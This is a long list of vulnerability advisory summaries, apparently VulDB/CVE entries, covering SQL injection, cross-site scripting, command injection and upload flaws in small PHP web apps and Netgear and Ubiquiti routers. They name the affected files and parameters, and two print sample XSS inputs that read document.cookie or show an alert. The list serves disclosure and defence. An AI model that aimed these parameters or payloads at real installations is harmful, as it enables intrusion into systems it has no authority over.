A vulnerability has been found in SourceCodester AC Repair and Services System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/bookings/view_booking.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227704.
A vulnerability, which was classified as critical, was found in SourceCodester AC Repair and Services System 1.0. This affects an unknown part of the file /admin/services/view_service.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227703.
A vulnerability, which was classified as critical, has been found in SourceCodester AC Repair and Services System 1.0. Affected by this issue is some unknown functionality of the file services/view.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-227702 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in SourceCodester Simple Mobile Comparison Website 1.0. This issue affects some unknown processing of the file classes/Master.php?f=save_field. The manipulation of the argument Field Name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227675.
A vulnerability classified as problematic was found in Netgear SRX5308 up to 4.3.5-3. This vulnerability affects unknown code of the component Web Management Interface. The manipulation of the argument USERDBUsers.Password leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-227674 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in Netgear SRX5308 up to 4.3.5-3. This affects an unknown part of the component Web Management Interface. The manipulation of the argument Login.userAgent leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227673 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Netgear SRX5308 up to 4.3.5-3. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Web Management Interface. The manipulation of the argument wanName leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Netgear SRX5308 up to 4.3.5-3. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file scgi-bin/platform.cgi?page=dmz_setup.htm of the component Web Management Interface. The manipulation of the argument ConfigPort.LogicalIfName leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Netgear SRX5308 up to 4.3.5-3. It has been classified as problematic. Affected is an unknown function of the file scgi-bin/platform.cgi?page=time_zone.htm of the component Web Management Interface. The manipulation of the argument ManualDate.minutes leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-227670 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Netgear SRX5308 up to 4.3.5-3 and classified as problematic. This issue affects some unknown processing of the file scgi-bin/platform.cgi?page=time_zone.htm of the component Web Management Interface. The manipulation of the argument ntp.server2 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227669 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Netgear SRX5308 up to 4.3.5-3 and classified as problematic. This vulnerability affects unknown code of the file scgi-bin/platform.cgi?page=time_zone.htm of the component Web Management Interface. The manipulation of the argument ntp.server1 leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227668. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in Netgear SRX5308 up to 4.3.5-3. This affects an unknown part of the file scgi-bin/platform.cgi?page=firewall_logs_email.htm of the component Web Management Interface. The manipulation of the argument smtpServer.emailServer leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227667. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in Netgear SRX5308 up to 4.3.5-3. Affected by this issue is some unknown functionality of the file scgi-bin/platform.cgi?page=firewall_logs_email.htm of the component Web Management Interface. The manipulation of the argument smtpServer.fromAddr leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-227666 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in Netgear SRX5308 up to 4.3.5-3. Affected by this vulnerability is an unknown functionality of the file scgi-bin/platform.cgi?page=dmz_setup.htm of the component Web Management Interface. The manipulation of the argument winsServer1 leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227665 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in Netgear SRX5308 up to 4.3.5-3. Affected is an unknown function of the file scgi-bin/platform.cgi?page=firewall_logs_email.htm of the component Web Management Interface. The manipulation of the argument smtpServer.toAddr leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227664. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Netgear SRX5308 up to 4.3.5-3. It has been rated as problematic. This issue affects some unknown processing of the file scgi-bin/platform.cgi?page=ike_policies.htm of the component Web Management Interface. The manipulation of the argument IpsecIKEPolicy.IKEPolicyName leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227663. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Netgear SRX5308 up to 4.3.5-3. It has been declared as problematic. This vulnerability affects unknown code of the file scgi-bin/platform.cgi?page=dmz_setup.htm of the component Web Management Interface. The manipulation of the argument dhcp.SecDnsIPByte2 leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-227662 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Netgear SRX5308 up to 4.3.5-3. It has been classified as problematic. This affects an unknown part of the file scgi-bin/platform.cgi?page=firewall_logs_email.htm of the component Web Management Interface. The manipulation of the argument smtpServer.fromAddr leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227661 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Netgear SRX5308 up to 4.3.5-3 and classified as problematic. Affected by this issue is some unknown functionality of the file scgi-bin/platform.cgi?page=firewall_logs_email.htm of the component Web Management Interface. The manipulation of the argument sysLogInfo.serverName leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227660. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Netgear SRX5308 up to 4.3.5-3 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file scgi-bin/platform.cgi?page=bandwidth_profile.htm of the component Web Management Interface. The manipulation of the argument BandWidthProfile.ProfileName leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227659. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in Netgear SRX5308 up to 4.3.5-3. Affected is an unknown function. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-227658 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Ubiquiti EdgeRouter X up to 2.0.9-hotfix.6. This affects an unknown part of the component Web Service. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227655.
A vulnerability was found in Ubiquiti EdgeRouter X up to 2.0.9-hotfix.6. It has been rated as critical. Affected by this issue is some unknown functionality of the component Web Management Interface. The manipulation of the argument suffix-rate-up leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-227654 is the identifier assigned to this vulnerability.
A vulnerability was found in Ubiquiti EdgeRouter X up to 2.0.9-hotfix.6. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Web Management Interface. The manipulation of the argument name leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227653 was assigned to this vulnerability.
A vulnerability was found in Ubiquiti EdgeRouter X up to 2.0.9-hotfix.6. It has been classified as critical. Affected is an unknown function of the component Web Management Interface. The manipulation of the argument dpi leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227652.
A vulnerability was found in Ubiquiti EdgeRouter X up to 2.0.9-hotfix.6 and classified as critical. This issue affects some unknown processing of the component Web Management Interface. The manipulation of the argument src leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227651.
A vulnerability has been found in Ubiquiti EdgeRouter X up to 2.0.9-hotfix.6 and classified as critical. This vulnerability affects unknown code of the component Web Management Interface. The manipulation of the argument ecn-down leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-227650 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Ubiquiti EdgeRouter X up to 2.0.9-hotfix.6. This affects an unknown part of the component Web Management Interface. The manipulation of the argument ecn-up leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227649 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in SourceCodester Online DJ Management System 1.0. Affected by this issue is some unknown functionality of the file classes/Master.php?f=save_event. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227648.
A vulnerability classified as critical was found in SourceCodester Online DJ Management System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/inquiries/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227647.
A vulnerability classified as critical has been found in SourceCodester Online DJ Management System 1.0. Affected is an unknown function of the file admin/events/manage_event.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-227646 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Faculty Evaluation System 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin/manage_restriction.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227645 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Faculty Evaluation System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file index.php?page=manage_questionnaire. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227644.
A vulnerability was found in SourceCodester Faculty Evaluation System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/manage_academic.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227643.
A vulnerability was found in SourceCodester Faculty Evaluation System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file ajax.php?action=delete_class. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-227642 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Faculty Evaluation System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file ajax.php?action=delete_subject. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227641 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Resort Reservation System 1.0. Affected is an unknown function of the file registration.php. The manipulation of the argument fullname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227640.
A vulnerability, which was classified as critical, has been found in SourceCodester Resort Reservation System 1.0. This issue affects some unknown processing of the file view_room.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227639.
A vulnerability classified as problematic was found in SourceCodester Service Provider Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /classes/Users.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227593 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in SourceCodester Service Provider Management System 1.0. Affected is an unknown function of the file /admin/index.php. The manipulation of the argument page leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227592.
A vulnerability was found in SourceCodester Service Provider Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/user/manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227591.
A vulnerability was found in SourceCodester Service Provider Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/services/manage_service.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-227590 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Service Provider Management System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/inquiries/view_inquiry.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227589 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Service Provider Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /classes/Master.php?f=delete_inquiry. The manipulation leads to improper authorization. The attack may be launched remotely. The identifier of this vulnerability is VDB-227588.
A vulnerability has been found in SourceCodester Service Provider Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=save_service of the component HTTP POST Request Handler. The manipulation of the argument name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227587.
A vulnerability was found in UCMS 1.6.0. It has been classified as problematic. This affects an unknown part of the file saddpost.php of the component Column Configuration. The manipulation of the argument strorder leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227481 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Purchase Order Management System 1.0. It has been classified as problematic. This affects an unknown part of the file classes/Master.php?f=save_item. The manipulation of the argument description with the input &lt;script&gt;alert(document.cookie)&lt;/script&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227463.
Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
Flarum is a forum software for building communities. Using the mentions feature provided by the flarum/mentions extension, users can mention any post ID on the forum with the special `@"&lt;username&gt;"#p&lt;id&gt;` syntax. The following behavior never changes no matter if the actor should be able to read the mentioned post or not: A URL to the mentioned post is inserted into the actor post HTML, leaking its discussion ID and post number. The `mentionsPosts` relationship included in the `POST /api/posts` and `PATCH /api/posts/&lt;id&gt;` JSON responses leaks the full JSON:API payload of all mentioned posts without any access control. This includes the content, date, number and attributes added by other extensions. An attacker only needs the ability to create new posts on the forum to exploit the vulnerability. This works even if new posts require approval. If they have the ability to edit posts, the attack can be performed even more discreetly by using a single post to scan any size of database and hiding the attack post content afterward. The attack allows the leaking of all posts in the forum database, including posts awaiting approval, posts in tags the user has no access to, and private discussions created by other extensions like FriendsOfFlarum Byobu. This also includes non-comment posts like tag changes or renaming events. The discussion payload is not leaked but using the mention HTML payload it's possible to extract the discussion ID of all posts and combine all posts back together into their original discussions even if the discussion title remains unknown. All Flarum versions prior to 1.6.3 are affected. The vulnerability has been fixed and published as flarum/core v1.6.3. As a workaround, user can disable the mentions extension.
A vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0 and classified as critical. This vulnerability affects unknown code of the file admin/ajax.php?action=save_settings. The manipulation of the argument img leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227236.
A vulnerability was found in hansunCMS 1.4.3. It has been declared as critical. This vulnerability affects unknown code of the file /ueditor/net/controller.ashx?action=catchimage. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-227230 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Eyewear Shop 1.0. It has been classified as critical. This affects an unknown part of the file /admin/orders/update_status.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227229 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Complaint Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file users/registration.php of the component POST Parameter Handler. The manipulation of the argument fullname leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227228.
On BIG-IP versions 17.0.x before 17.0.0.2 and 16.1.x before 16.1.3.3, when a HTTP profile with the non-default Enforcement options of Enforce HTTP Compliance and Unknown Methods: Reject are configured on a virtual server, undisclosed requests can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
A vulnerability has been found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the component GET Parameter Handler. The manipulation of the argument c/s leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227227.
A vulnerability, which was classified as critical, was found in MAXTECH MAX-G866ac 0.4.1_TBRO_20160314. This affects an unknown part of the component Remote Management. The manipulation leads to missing authentication. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227001 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Dream Technology mica up to 3.0.5. It has been classified as problematic. Affected is an unknown function of the component Form Object Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-226986 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Task Reminder System 1.0 and classified as problematic. This issue affects some unknown processing of the file /classes/Users.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226985 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Task Reminder System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/user/manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226984.
A vulnerability, which was classified as critical, was found in SourceCodester Task Reminder System 1.0. This affects an unknown part of the file /admin/reminders/manage_reminder.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226983.
A vulnerability classified as problematic was found in Campcodes Coffee Shop POS System 1.0. Affected by this vulnerability is an unknown functionality of the file /classes/Users.php. The manipulation of the argument firstname leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226981 was assigned to this vulnerability.
A vulnerability classified as critical has been found in Campcodes Coffee Shop POS System 1.0. Affected is an unknown function of the file /admin/user/manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226980.
A vulnerability was found in Campcodes Coffee Shop POS System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/sales/manage_sale.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226979.
A vulnerability was found in Campcodes Coffee Shop POS System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/products/manage_product.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-226978 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Coffee Shop POS System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/products/view_product.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226977 was assigned to this vulnerability.
A vulnerability was found in Campcodes Coffee Shop POS System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/categories/manage_category.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226976.
A vulnerability has been found in Campcodes Coffee Shop POS System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/categories/view_category.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226975.
A vulnerability, which was classified as critical, was found in Campcodes Coffee Shop POS System 1.0. Affected is an unknown function of the file /admin/sales/view_details.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226974 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Campcodes Retro Basketball Shoes Online Store 1.0. This issue affects some unknown processing of the file details.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226973 was assigned to this vulnerability.
A vulnerability classified as critical was found in Campcodes Retro Basketball Shoes Online Store 1.0. This vulnerability affects unknown code of the file contactus1.php. The manipulation of the argument email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226972.
A vulnerability classified as critical has been found in Campcodes Retro Basketball Shoes Online Store 1.0. This affects an unknown part of the file contactus.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226971.
A vulnerability was found in Campcodes Retro Basketball Shoes Online Store 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /function/login.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-226970 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Retro Basketball Shoes Online Store 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file faqs.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226969 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Air Cargo Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file classes/Master.php?f=save_cargo_type. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226276.
A vulnerability was found in SourceCodester Task Reminder System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/?page=reminders/view_reminder. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226275.
A vulnerability was found in SourceCodester Complaint Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file admin/assets/plugins/DataTables/examples/examples_support/editable_ajax.php of the component POST Parameter Handler. The manipulation of the argument value with the input 1&gt;&lt;script&gt;alert(666)&lt;/script&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-226274 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Student Study Center Desk Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file index.php. The manipulation of the argument page leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226273 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Student Study Center Desk Management System 1.0. Affected is an unknown function of the file manage_student.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226272.
A vulnerability, which was classified as critical, has been found in SourceCodester Task Reminder System 1.0. This issue affects some unknown processing of the file Master.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226271.
A vulnerability classified as critical was found in Campcodes Online Thesis Archiving System 1.0. This vulnerability affects unknown code of the file /admin/user/manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-226270 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in Campcodes Online Thesis Archiving System 1.0. This affects an unknown part of the file /admin/curriculum/view_curriculum.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226269 was assigned to this vulnerability.
A vulnerability was found in Campcodes Online Thesis Archiving System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/students/view_details.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226268.
A vulnerability was found in Campcodes Online Thesis Archiving System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file classes/Master.php. The manipulation of the argument name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226267.
A vulnerability was found in Campcodes Online Thesis Archiving System 1.0. It has been classified as critical. Affected is an unknown function of the file projects_per_curriculum.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226266 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Online Thesis Archiving System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/departments/view_department.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226265 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Judging Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file edit_contestant.php. The manipulation of the argument contestant_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226147.
A vulnerability, which was classified as critical, was found in IBOS 4.5.5. Affected is an unknown function of the file file/personal/del&amp;op=recycle. The manipulation of the argument fids leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226110 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Vehicle Service Management System 1.0. This vulnerability affects unknown code of the file /admin/report/index.php. The manipulation of the argument date_end leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226108.
A vulnerability classified as problematic has been found in SourceCodester Vehicle Service Management System 1.0. This affects an unknown part of the file /classes/Users.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226107.
A vulnerability was found in SourceCodester Vehicle Service Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /inc/topBarNav.php. The manipulation of the argument search leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-226106 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Vehicle Service Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226105 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Vehicle Service Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/service_requests/manage_inventory.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226104.
A vulnerability was found in SourceCodester Vehicle Service Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/maintenance/manage_category.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226103.
A vulnerability has been found in SourceCodester Vehicle Service Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/mechanics/manage_mechanic.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-226102 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Vehicle Service Management System 1.0. This affects an unknown part of the file /classes/Login.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226101 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Vehicle Service Management System 1.0. Affected by this issue is some unknown functionality of the file view_service.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226100.
